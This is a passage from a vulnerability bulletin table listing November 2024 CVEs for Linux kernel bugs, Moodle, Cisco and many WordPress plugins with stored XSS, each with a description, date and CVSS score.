In the Linux kernel, the following vulnerability has been resolved: net: stmmac: TSO: Fix unbalanced DMA map/unmap for non-paged SKB data In case the non-paged data of a SKB carries protocol header and protocol payload to be transmitted on a certain platform that the DMA AXI address width is configured to 40-bit/48-bit, or the size of the non-paged data is bigger than TSO_MAX_BUFF_SIZE on a certain platform that the DMA AXI address width is configured to 32-bit, then this SKB requires at least two DMA transmit descriptors to serve it. For example, three descriptors are allocated to split one DMA buffer mapped from one piece of non-paged data: dma_desc[N + 0], dma_desc[N + 1], dma_desc[N + 2]. Then three elements of tx_q->tx_skbuff_dma[] will be allocated to hold extra information to be reused in stmmac_tx_clean(): tx_q->tx_skbuff_dma[N + 0], tx_q->tx_skbuff_dma[N + 1], tx_q->tx_skbuff_dma[N + 2]. Now we focus on tx_q->tx_skbuff_dma[entry].buf, which is the DMA buffer address returned by DMA mapping call. stmmac_tx_clean() will try to unmap the DMA buffer _ONLY_IF_ tx_q->tx_skbuff_dma[entry].buf is a valid buffer address. The expected behavior that saves DMA buffer address of this non-paged data to tx_q->tx_skbuff_dma[entry].buf is: tx_q->tx_skbuff_dma[N + 0].buf = NULL; tx_q->tx_skbuff_dma[N + 1].buf = NULL; tx_q->tx_skbuff_dma[N + 2].buf = dma_map_single(); Unfortunately, the current code misbehaves like this: tx_q->tx_skbuff_dma[N + 0].buf = dma_map_single(); tx_q->tx_skbuff_dma[N + 1].buf = NULL; tx_q->tx_skbuff_dma[N + 2].buf = NULL; On the stmmac_tx_clean() side, when dma_desc[N + 0] is closed by the DMA engine, tx_q->tx_skbuff_dma[N + 0].buf is a valid buffer address obviously, then the DMA buffer will be unmapped immediately. There may be a rare case that the DMA engine does not finish the pending dma_desc[N + 1], dma_desc[N + 2] yet. Now things will go horribly wrong, DMA is going to access a unmapped/unreferenced memory region, corrupted data will be transmited or iommu fault will be triggered :( In contrast, the for-loop that maps SKB fragments behaves perfectly as expected, and that is how the driver should do for both non-paged data and paged frags actually. This patch corrects DMA map/unmap sequences by fixing the array index for tx_q->tx_skbuff_dma[entry].buf when assigning DMA buffer address. Tested and verified on DWXGMAC CORE 3.20a | 2024-11-19 | 5.5 | CVE-2024-53058 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: media: dvbdev: prevent the risk of out of memory access The dvbdev contains a static variable used to store dvb minors. The behavior of it depends if CONFIG_DVB_DYNAMIC_MINORS is set or not. When not set, dvb_register_device() won't check for boundaries, as it will rely that a previous call to dvb_register_adapter() would already be enforcing it. On a similar way, dvb_device_open() uses the assumption that the register functions already did the needed checks. This can be fragile if some device ends using different calls. This also generate warnings on static check analysers like Coverity. So, add explicit guards to prevent potential risk of OOM issues. | 2024-11-19 | 5.5 | CVE-2024-53063 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: idpf: fix idpf_vc_core_init error path In an event where the platform running the device control plane is rebooted, reset is detected on the driver. It releases all the resources and waits for the reset to complete. Once the reset is done, it tries to build the resources back. At this time if the device control plane is not yet started, then the driver timeouts on the virtchnl message and retries to establish the mailbox again. In the retry flow, mailbox is deinitialized but the mailbox workqueue is still alive and polling for the mailbox message. This results in accessing the released control queue leading to null-ptr-deref. Fix it by unrolling the work queue cancellation and mailbox deinitialization in the reverse order which they got initialized. | 2024-11-19 | 5.5 | CVE-2024-53064 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: mm/slab: fix warning caused by duplicate kmem_cache creation in kmem_buckets_create Commit b035f5a6d852 ("mm: slab: reduce the kmalloc() minimum alignment if DMA bouncing possible") reduced ARCH_KMALLOC_MINALIGN to 8 on arm64. However, with KASAN_HW_TAGS enabled, arch_slab_minalign() becomes 16. This causes kmalloc_caches[*][8] to be aliased to kmalloc_caches[*][16], resulting in kmem_buckets_create() attempting to create a kmem_cache for size 16 twice. This duplication triggers warnings on boot: [ 2.325108] ------------[ cut here ]------------ [ 2.325135] kmem_cache of name 'memdup_user-16' already exists [ 2.325783] WARNING: CPU: 0 PID: 1 at mm/slab_common.c:107 __kmem_cache_create_args+0xb8/0x3b0 [ 2.327957] Modules linked in: [ 2.328550] CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.12.0-rc5mm-unstable-arm64+ #12 [ 2.328683] Hardware name: QEMU QEMU Virtual Machine, BIOS 2024.02-2 03/11/2024 [ 2.328790] pstate: 61000009 (nZCv daif -PAN -UAO -TCO +DIT -SSBS BTYPE=--) [ 2.328911] pc : __kmem_cache_create_args+0xb8/0x3b0 [ 2.328930] lr : __kmem_cache_create_args+0xb8/0x3b0 [ 2.328942] sp : ffff800083d6fc50 [ 2.328961] x29: ffff800083d6fc50 x28: f2ff0000c1674410 x27: ffff8000820b0598 [ 2.329061] x26: 000000007fffffff x25: 0000000000000010 x24: 0000000000002000 [ 2.329101] x23: ffff800083d6fce8 x22: ffff8000832222e8 x21: ffff800083222388 [ 2.329118] x20: f2ff0000c1674410 x19: f5ff0000c16364c0 x18: ffff800083d80030 [ 2.329135] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [ 2.329152] x14: 0000000000000000 x13: 0a73747369786520 x12: 79646165726c6120 [ 2.329169] x11: 656820747563205b x10: 2d2d2d2d2d2d2d2d x9 : 0000000000000000 [ 2.329194] x8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000 [ 2.329210] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ 2.329226] x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 [ 2.329291] Call trace: [ 2.329407] __kmem_cache_create_args+0xb8/0x3b0 [ 2.329499] kmem_buckets_create+0xfc/0x320 [ 2.329526] init_user_buckets+0x34/0x78 [ 2.329540] do_one_initcall+0x64/0x3c8 [ 2.329550] kernel_init_freeable+0x26c/0x578 [ 2.329562] kernel_init+0x3c/0x258 [ 2.329574] ret_from_fork+0x10/0x20 [ 2.329698] ---[ end trace 0000000000000000 ]--- [ 2.403704] ------------[ cut here ]------------ [ 2.404716] kmem_cache of name 'msg_msg-16' already exists [ 2.404801] WARNING: CPU: 2 PID: 1 at mm/slab_common.c:107 __kmem_cache_create_args+0xb8/0x3b0 [ 2.404842] Modules linked in: [ 2.404971] CPU: 2 UID: 0 PID: 1 Comm: swapper/0 Tainted: G W 6.12.0-rc5mm-unstable-arm64+ #12 [ 2.405026] Tainted: [W]=WARN [ 2.405043] Hardware name: QEMU QEMU Virtual Machine, BIOS 2024.02-2 03/11/2024 [ 2.405057] pstate: 60400009 (nZCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) [ 2.405079] pc : __kmem_cache_create_args+0xb8/0x3b0 [ 2.405100] lr : __kmem_cache_create_args+0xb8/0x3b0 [ 2.405111] sp : ffff800083d6fc50 [ 2.405115] x29: ffff800083d6fc50 x28: fbff0000c1674410 x27: ffff8000820b0598 [ 2.405135] x26: 000000000000ffd0 x25: 0000000000000010 x24: 0000000000006000 [ 2.405153] x23: ffff800083d6fce8 x22: ffff8000832222e8 x21: ffff800083222388 [ 2.405169] x20: fbff0000c1674410 x19: fdff0000c163d6c0 x18: ffff800083d80030 [ 2.405185] x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 [ 2.405201] x14: 0000000000000000 x13: 0a73747369786520 x12: 79646165726c6120 [ 2.405217] x11: 656820747563205b x10: 2d2d2d2d2d2d2d2d x9 : 0000000000000000 [ 2.405233] x8 : 0000000000000000 x7 : 0000000000000000 x6 : 0000000000000000 [ 2.405248] x5 : 0000000000000000 x4 : 0000000000000000 x3 : 0000000000000000 [ 2.405271] x2 : 0000000000000000 x1 : 0000000000000000 x0 : 0000000000000000 [ 2.405287] Call trace: [ 2 ---truncated--- | 2024-11-19 | 5.5 | CVE-2024-53065 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: nfs: Fix KMSAN warning in decode_getfattr_attrs() Fix the following KMSAN warning: CPU: 1 UID: 0 PID: 7651 Comm: cp Tainted: G B Tainted: [B]=BAD_PAGE Hardware name: QEMU Standard PC (Q35 + ICH9, 2009) ===================================================== ===================================================== BUG: KMSAN: uninit-value in decode_getfattr_attrs+0x2d6d/0x2f90 decode_getfattr_attrs+0x2d6d/0x2f90 decode_getfattr_generic+0x806/0xb00 nfs4_xdr_dec_getattr+0x1de/0x240 rpcauth_unwrap_resp_decode+0xab/0x100 rpcauth_unwrap_resp+0x95/0xc0 call_decode+0x4ff/0xb50 __rpc_execute+0x57b/0x19d0 rpc_execute+0x368/0x5e0 rpc_run_task+0xcfe/0xee0 nfs4_proc_getattr+0x5b5/0x990 __nfs_revalidate_inode+0x477/0xd00 nfs_access_get_cached+0x1021/0x1cc0 nfs_do_access+0x9f/0xae0 nfs_permission+0x1e4/0x8c0 inode_permission+0x356/0x6c0 link_path_walk+0x958/0x1330 path_lookupat+0xce/0x6b0 filename_lookup+0x23e/0x770 vfs_statx+0xe7/0x970 vfs_fstatat+0x1f2/0x2c0 __se_sys_newfstatat+0x67/0x880 __x64_sys_newfstatat+0xbd/0x120 x64_sys_call+0x1826/0x3cf0 do_syscall_64+0xd0/0x1b0 entry_SYSCALL_64_after_hwframe+0x77/0x7f The KMSAN warning is triggered in decode_getfattr_attrs(), when calling decode_attr_mdsthreshold(). It appears that fattr->mdsthreshold is not initialized. Fix the issue by initializing fattr->mdsthreshold to NULL in nfs_fattr_init(). | 2024-11-19 | 5.5 | CVE-2024-53066 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: scsi: ufs: core: Start the RTC update work later The RTC update work involves runtime resuming the UFS controller. Hence, only start the RTC update work after runtime power management in the UFS driver has been fully initialized. This patch fixes the following kernel crash: Internal error: Oops: 0000000096000006 [#1] PREEMPT SMP Workqueue: events ufshcd_rtc_work Call trace: _raw_spin_lock_irqsave+0x34/0x8c (P) pm_runtime_get_if_active+0x24/0x9c (L) pm_runtime_get_if_active+0x24/0x9c ufshcd_rtc_work+0x138/0x1b4 process_one_work+0x148/0x288 worker_thread+0x2cc/0x3d4 kthread+0x110/0x114 ret_from_fork+0x10/0x20 | 2024-11-19 | 5.5 | CVE-2024-53067 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: firmware: qcom: scm: fix a NULL-pointer dereference Some SCM calls can be invoked with __scm being NULL (the driver may not have been and will not be probed as there's no SCM entry in device-tree). Make sure we don't dereference a NULL pointer. | 2024-11-19 | 5.5 | CVE-2024-53069 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: usb: dwc3: fix fault at system suspend if device was already runtime suspended If the device was already runtime suspended then during system suspend we cannot access the device registers else it will crash. Also we cannot access any registers after dwc3_core_exit() on some platforms so move the dwc3_enable_susphy() call to the top. | 2024-11-19 | 5.5 | CVE-2024-53070 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: platform/x86/amd/pmc: Detect when STB is not available Loading the amd_pmc module as: amd_pmc enable_stb=1 ...can result in the following messages in the kernel ring buffer: amd_pmc AMDI0009:00: SMU cmd failed. err: 0xff ioremap on RAM at 0x0000000000000000 - 0x0000000000ffffff WARNING: CPU: 10 PID: 2151 at arch/x86/mm/ioremap.c:217 __ioremap_caller+0x2cd/0x340 Further debugging reveals that this occurs when the requests for S2D_PHYS_ADDR_LOW and S2D_PHYS_ADDR_HIGH return a value of 0, indicating that the STB is inaccessible. To prevent the ioremap warning and provide clarity to the user, handle the invalid address and display an error message. | 2024-11-19 | 5.5 | CVE-2024-53072 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: NFSD: Never decrement pending_async_copies on error The error flow in nfsd4_copy() calls cleanup_async_copy(), which already decrements nn->pending_async_copies. | 2024-11-19 | 5.5 | CVE-2024-53073 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: wifi: iwlwifi: mvm: don't leak a link on AP removal Release the link mapping resource in AP removal. This impacted devices that do not support the MLD API (9260 and down). On those devices, we couldn't start the AP again after the AP has been already started and stopped. | 2024-11-19 | 5.5 | CVE-2024-53074 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: riscv: Prevent a bad reference count on CPU nodes When populating cache leaves we previously fetched the CPU device node at the very beginning. But when ACPI is enabled we go through a specific branch which returns early and does not call 'of_node_put' for the node that was acquired. Since we are not using a CPU device node for the ACPI code anyways, we can simply move the initialization of it just passed the ACPI block, and we are guaranteed to have an 'of_node_put' call for the acquired node. This prevents a bad reference count of the CPU device node. Moreover, the previous function did not check for errors when acquiring the device node, so a return -ENOENT has been added for that case. | 2024-11-19 | 5.5 | CVE-2024-53075 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: iio: gts-helper: Fix memory leaks for the error path of iio_gts_build_avail_scale_table() If per_time_scales[i] or per_time_gains[i] kcalloc fails in the for loop of iio_gts_build_avail_scale_table(), the err_free_out will fail to call kfree() each time when i is reduced to 0, so all the per_time_scales[0] and per_time_gains[0] will not be freed, which will cause memory leaks. Fix it by checking if i >= 0. | 2024-11-19 | 5.5 | CVE-2024-53076 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: rpcrdma: Always release the rpcrdma_device's xa_array Dai pointed out that the xa_init_flags() in rpcrdma_add_one() needs to have a matching xa_destroy() in rpcrdma_remove_one() to release underlying memory that the xarray might have accrued during operation. | 2024-11-19 | 5.5 | CVE-2024-53077 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/tegra: Fix NULL vs IS_ERR() check in probe() The iommu_paging_domain_alloc() function doesn't return NULL pointers, it returns error pointers. Update the check to match. | 2024-11-19 | 5.5 | CVE-2024-53078 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: i40e: fix race condition by adding filter's intermediate sync state Fix a race condition in the i40e driver that leads to MAC/VLAN filters becoming corrupted and leaking. Address the issue that occurs under heavy load when multiple threads are concurrently modifying MAC/VLAN filters by setting mac and port VLAN. 1. Thread T0 allocates a filter in i40e_add_filter() within i40e_ndo_set_vf_port_vlan(). 2. Thread T1 concurrently frees the filter in __i40e_del_filter() within i40e_ndo_set_vf_mac(). 3. Subsequently, i40e_service_task() calls i40e_sync_vsi_filters(), which refers to the already freed filter memory, causing corruption. Reproduction steps: 1. Spawn multiple VFs. 2. Apply a concurrent heavy load by running parallel operations to change MAC addresses on the VFs and change port VLANs on the host. 3. Observe errors in dmesg: "Error I40E_AQ_RC_ENOSPC adding RX filters on VF XX, please set promiscuous on manually for VF XX". Exact code for stable reproduction Intel can't open-source now. The fix involves implementing a new intermediate filter state, I40E_FILTER_NEW_SYNC, for the time when a filter is on a tmp_add_list. These filters cannot be deleted from the hash list directly but must be removed using the full process. | 2024-11-19 | 4.7 | CVE-2024-53088 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: io_uring/rw: fix missing NOWAIT check for O_DIRECT start write When io_uring starts a write, it'll call kiocb_start_write() to bump the super block rwsem, preventing any freezes from happening while that write is in-flight. The freeze side will grab that rwsem for writing, excluding any new writers from happening and waiting for existing writes to finish. But io_uring unconditionally uses kiocb_start_write(), which will block if someone is currently attempting to freeze the mount point. This causes a deadlock where freeze is waiting for previous writes to complete, but the previous writes cannot complete, as the task that is supposed to complete them is blocked waiting on starting a new write. This results in the following stuck trace showing that dependency with the write blocked starting a new write: task:fio state:D stack:0 pid:886 tgid:886 ppid:876 Call trace: __switch_to+0x1d8/0x348 __schedule+0x8e8/0x2248 schedule+0x110/0x3f0 percpu_rwsem_wait+0x1e8/0x3f8 __percpu_down_read+0xe8/0x500 io_write+0xbb8/0xff8 io_issue_sqe+0x10c/0x1020 io_submit_sqes+0x614/0x2110 __arm64_sys_io_uring_enter+0x524/0x1038 invoke_syscall+0x74/0x268 el0_svc_common.constprop.0+0x160/0x238 do_el0_svc+0x44/0x60 el0_svc+0x44/0xb0 el0t_64_sync_handler+0x118/0x128 el0t_64_sync+0x168/0x170 INFO: task fsfreeze:7364 blocked for more than 15 seconds. Not tainted 6.12.0-rc5-00063-g76aaf945701c #7963 with the attempting freezer stuck trying to grab the rwsem: task:fsfreeze state:D stack:0 pid:7364 tgid:7364 ppid:995 Call trace: __switch_to+0x1d8/0x348 __schedule+0x8e8/0x2248 schedule+0x110/0x3f0 percpu_down_write+0x2b0/0x680 freeze_super+0x248/0x8a8 do_vfs_ioctl+0x149c/0x1b18 __arm64_sys_ioctl+0xd0/0x1a0 invoke_syscall+0x74/0x268 el0_svc_common.constprop.0+0x160/0x238 do_el0_svc+0x44/0x60 el0_svc+0x44/0xb0 el0t_64_sync_handler+0x118/0x128 el0t_64_sync+0x168/0x170 Fix this by having the io_uring side honor IOCB_NOWAIT, and only attempt a blocking grab of the super block rwsem if it isn't set. For normal issue where IOCB_NOWAIT would always be set, this returns -EAGAIN which will have io_uring core issue a blocking attempt of the write. That will in turn also get completions run, ensuring forward progress. Since freezing requires CAP_SYS_ADMIN in the first place, this isn't something that can be triggered by a regular user. | 2024-11-19 | 4.4 | CVE-2024-53052 |
| maheshwaghmare -- copy_anything_to_clipboard |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Clipboard Team Copy Anything to Clipboard allows Stored XSS.This issue affects Copy Anything to Clipboard: from n/a through 4.0.3. | 2024-11-18 | 5.4 | CVE-2024-52419 |
| moodle -- moodle |
A vulnerability was found in Moodle. It is possible for users with the "send message" capability to view other users' names that they may not otherwise have access to via an error message in Messaging. Note: The name returned follows the full name format configured on the site. | 2024-11-18 | 4.3 | CVE-2024-48896 |
| moodle -- moodle |
A vulnerability was found in Moodle. Additional checks are required to ensure users can only edit or delete RSS feeds that they have permission to modify. | 2024-11-18 | 4.3 | CVE-2024-48897 |
| moodle -- moodle |
A vulnerability was found in Moodle. Users with access to delete audiences from reports could delete audiences from other reports that they do not have permission to delete from. | 2024-11-18 | 4.3 | CVE-2024-48898 |
| moodle -- moodle |
A vulnerability was found in Moodle. Additional checks are required to ensure users can only access the schedule of a report if they have permission to edit that report. | 2024-11-18 | 4.3 | CVE-2024-48901 |
| motopress -- getwid |
The Getwid - Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `template-post-custom-field` block in all versions up to, and including, 2.0.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-20 | 5.4 | CVE-2024-10872 |
| n/a -- n/a |
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in django CMS Association django CMS Attributes Fields allows Stored XSS.This issue affects django CMS Attributes Fields: before 4.0. | 2024-11-20 | 6.9 | CVE-2024-11406 |
| n/a -- n/a |
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to read arbitrary files on the underlying filesystem of an affected system. This vulnerability is due to insufficient access control for sensitive information that is written to an affected system. An attacker could exploit this vulnerability by accessing sensitive information that they are not authorized to access on an affected system. A successful exploit could allow the attacker to gain access to devices and other network management systems that they should not have access to.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 6.5 | CVE-2021-1232 |
| n/a -- n/a |
Multiple vulnerabilities in the Cisco Discovery Protocol and Link Layer Discovery Protocol (LLDP) implementations for Cisco IP Phone Series 68xx/78xx/88xx could allow an unauthenticated, adjacent attacker to execute code remotely or cause a reload of an affected IP phone. These vulnerabilities are due to missing checks when the IP phone processes a Cisco Discovery Protocol or LLDP packet. An attacker could exploit these vulnerabilities by sending a malicious Cisco Discovery Protocol or LLDP packet to the targeted IP phone. A successful exploit could allow the attacker to execute code on the affected IP phone or cause it to reload unexpectedly, resulting in a denial of service (DoS) condition.Note: Cisco Discovery Protocol is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. | 2024-11-18 | 6.5 | CVE-2021-1379 |
| n/a -- n/a |
The ProfileGrid - User Profiles, Groups and Communities plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the pm_remove_file_attachment() function in all versions up to, and including, 5.9.3.6. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary user meta which can do things like deny an administrator's access to their site. . | 2024-11-20 | 6.5 | CVE-2024-10900 |
| n/a -- n/a |
A low privileged remote attacker can overwrite an arbitrary file on the filesystem which may lead to an arbitrary file read with root privileges. | 2024-11-18 | 6.5 | CVE-2024-41972 |
| n/a -- n/a |
IBM Db2 for Linux, UNIX and Windows (includes Db2 Connect Server) 11.1 and 11.5 is vulnerable to a denial of service as the server may crash under certain conditions with a specially crafted query. | 2024-11-21 | 6.5 | CVE-2024-45663 |
| n/a -- n/a |
The Twitter Follow Button plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'username' parameter in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-10116 |
| n/a -- n/a |
The Premium Packages - Sell Digital Products Securely plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's wpdmpp_pay_link shortcode in all versions up to, and including, 5.9.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-10164 |
| n/a -- n/a |
The WPBakery Visual Composer WHMCS Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's void_wbwhmcse_laouts_search shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-10172 |
| n/a -- n/a |
The Beds24 Online Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's beds24-link shortcode in all versions up to, and including, 2.0.26 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-10177 |
| n/a -- n/a |
The MP3 Audio Player - Music Player, Podcast Player & Radio by Sonaar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's sonaar_audioplayer shortcode in all versions up to, and including, 5.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-19 | 6.4 | CVE-2024-10268 |
| n/a -- n/a |
The Elfsight Telegram Chat CC plugin for WordPress is vulnerable to unauthorized modification of data to a missing capability check on the 'updatePreferences' function in all versions up to, and including, 1.1.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-18 | 6.4 | CVE-2024-10390 |
| n/a -- n/a |
The Gutenberg Blocks with AI by Kadence WP - Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 3.3.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-10785 |
| n/a -- n/a |
The Quotes llama plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'quotes-llama' shortcode in all versions up to, and including, 3.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-10874 |
| n/a -- n/a |
The Tribute Testimonials - WordPress Testimonial Grid/Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tribute_testimonials_slider' shortcode in all versions up to, and including, 1.0.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-10886 |
| n/a -- n/a |
The GD Rating System plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'extra_class' parameter in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-19 | 6.4 | CVE-2024-11198 |
| n/a -- n/a |
The Rescue Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's rescue_progressbar shortcode in all versions up to, and including, 2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11199 |
| n/a -- n/a |
The Parallax Image plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'position' parameter in all versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-19 | 6.4 | CVE-2024-11224 |
| n/a -- n/a |
The Memberlite Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's memberlite_accordion shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11227 |
| n/a -- n/a |
The ????? ?? ???? - ???? ?? ???? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's pafw_instant_payment shortcode in all versions up to, and including, 5.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11228 |
| n/a -- n/a |
The ???? ??? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's add_plus_friends and add_plus_talk shortcodes in all versions up to, and including, 1.1.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11229 |
| n/a -- n/a |
The ???? ????? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mnp_purchase shortcode in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11231 |
| n/a -- n/a |
The HIPAA Compliant Forms with Drag'n'Drop HIPAA Form Builder. Sign HIPAA documents plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'hipaatizer' shortcode in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11332 |
| n/a -- n/a |
The Control horas plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ch_registro' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-22 | 6.4 | CVE-2024-11381 |
| n/a -- n/a |
The Pure CSS Circle Progress bar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'circle_progress' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11385 |
| n/a -- n/a |
The Easy Liveblogs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'elb_liveblog' shortcode in all versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11387 |
| n/a -- n/a |
The Dino Game - Embed Google Chrome Dinosaur Game in WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dino-game' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11388 |
| n/a -- n/a |
The Slotti Ajanvaraus plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'slotti' shortcode in all versions up to, and including, 1.3.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-23 | 6.4 | CVE-2024-11408 |
| n/a -- n/a |
The Shine PDF Embeder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'shinepdf' shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-11-21 | 6.4 | CVE-2024-11412 |
| n/a -- n/a |
